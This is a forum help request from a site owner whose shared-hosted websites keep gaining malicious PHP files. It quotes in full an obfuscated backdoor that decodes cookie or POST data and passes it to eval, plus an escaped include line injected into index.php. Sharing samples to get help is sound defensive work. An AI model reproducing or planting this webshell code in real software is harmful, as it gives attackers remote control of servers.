Jump to content


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.

Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.


I get new files and code modifies on website

  • Please log in to reply
No replies to this topic

#1 sirjay


  • Members
  • 1 posts
  • Local time:07:00 PM

Posted 27 May 2018 - 03:50 AM

I need a help! This is very weird malware I get every week even if I delete it and I don't know what to do.
I have a virtual web hosting (not VPS). There are more than 10 websites like:
  •     /site1.com/public_html
  •     /site2.com/public_html
  •     /site3.com/public_html
  •     ...
Every week there it appears somehow new files in each website folder in `public_html`. 3-4 new files for every website in root:
  •     76nt0hgr.php
  •     ajax28.php
  •     hmbjcewn.php
It contains something like:
    $bhavl = 'pul821nm7_6ste-vxy\'agior#kdHbc*94';$ejlnjbs = Array();$ejlnjbs[] = $bhavl[27].$bhavl[30];$ejlnjbs[] = $bhavl[24];$ejlnjbs[] = $bhavl[31].$bhavl[8].$bhavl[32].$bhavl[10].$bhavl[4].$bhavl[26].$bhavl[5].$bhavl[29].$bhavl[14].$bhavl[32].$bhavl[32].$bhavl[31].$bhavl[5].$bhavl[14].$bhavl[32].$bhavl[29].$bhavl[3].$bhavl[26].$bhavl[14].$bhavl[28].$bhavl[32].$bhavl[28].$bhavl[19].$bhavl[14].$bhavl[4].$bhavl[32].$bhavl[31].$bhavl[19].$bhavl[5].$bhavl[19].$bhavl[13].$bhavl[13].$bhavl[3].$bhavl[5].$bhavl[13].$bhavl[10];$ejlnjbs[] = $bhavl[29].$bhavl[22].$bhavl[1].$bhavl[6].$bhavl[12];$ejlnjbs[] = $bhavl[11].$bhavl[12].$bhavl[23].$bhavl[9].$bhavl[23].$bhavl[13].$bhavl[0].$bhavl[13].$bhavl[19].$bhavl[12];$ejlnjbs[] = $bhavl[13].$bhavl[16].$bhavl[0].$bhavl[2].$bhavl[22].$bhavl[26].$bhavl[13];$ejlnjbs[] = $bhavl[11].$bhavl[1].$bhavl[28].$bhavl[11].$bhavl[12].$bhavl[23];$ejlnjbs[] = $bhavl[19].$bhavl[23].$bhavl[23].$bhavl[19].$bhavl[17].$bhavl[9].$bhavl[7].$bhavl[13].$bhavl[23].$bhavl[20].$bhavl[13];$ejlnjbs[] = $bhavl[11].$bhavl[12].$bhavl[23].$bhavl[2].$bhavl[13].$bhavl[6];$ejlnjbs[] = $bhavl[0].$bhavl[19].$bhavl[29].$bhavl[25];foreach ($ejlnjbs[7]($_COOKIE, $_POST) as $hhvsm => $cejrm){function twojb($ejlnjbs, $hhvsm, $jkzowhs){return $ejlnjbs[6]($ejlnjbs[4]($hhvsm . $ejlnjbs[2], ($jkzowhs / $ejlnjbs[8]($hhvsm)) + 1), 0, $jkzowhs);}function llhbte($ejlnjbs, $jxzkvi){return @$ejlnjbs[9]($ejlnjbs[0], $jxzkvi);}function flkmrh($ejlnjbs, $jxzkvi){$gtuyb = $ejlnjbs[3]($jxzkvi) % 3;if (!$gtuyb) {eval($jxzkvi[1]($jxzkvi[2]));exit();}}$cejrm = llhbte($ejlnjbs, $cejrm);flkmrh($ejlnjbs, $ejlnjbs[5]($ejlnjbs[1], $cejrm ^ twojb($ejlnjbs, $hhvsm, $ejlnjbs[8]($cejrm))));}
AND this malware modifies my index.php file! It adds this code at the beginning:
    @include "\057h\157m\145/\143s\055l\151s\164/\146r\151d\141r\171.\143o\155/\144o\143s\057.\144f\0665\143e\0652\056i\143o";
Anyone knows what to do, what can it be? I have emailed to my hosting provider about this problem, they said this is my problem and my websites are not secured.
What does it mean? I used: Yii2 framework, Wordpress (updated) and 2 websites with plain html + php email contact form. That's it!
Any ideas how to fix it? Thank you.

BC AdBot (Login to Remove)


0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users